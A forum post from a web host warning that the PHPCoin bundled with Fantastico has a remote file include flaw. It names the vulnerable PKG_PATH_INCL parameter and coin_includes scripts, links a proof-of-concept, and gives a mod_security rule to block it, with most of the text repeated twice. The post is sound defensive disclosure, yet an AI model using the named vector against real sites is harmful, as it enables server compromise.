The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.
Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt
Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.
SecFilter "PKG_PATH_INCL"
That should take care of it until Fantastico/PHPCoin releases an update.
Chris Meisinger
WingSix Hosting
www.wingsix.com
edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.
Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
Please see: http://downloads.securityfocus.com/vulnerabilities/exploits/phpCOIN1.2.3_fi_poc.txt
Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.
SecFilter "PKG_PATH_INCL"
That should take care of it until Fantastico/PHPCoin releases an update.
Chris Meisinger
WingSix Hosting
www.wingsix.com
edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.
Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
Last edited:
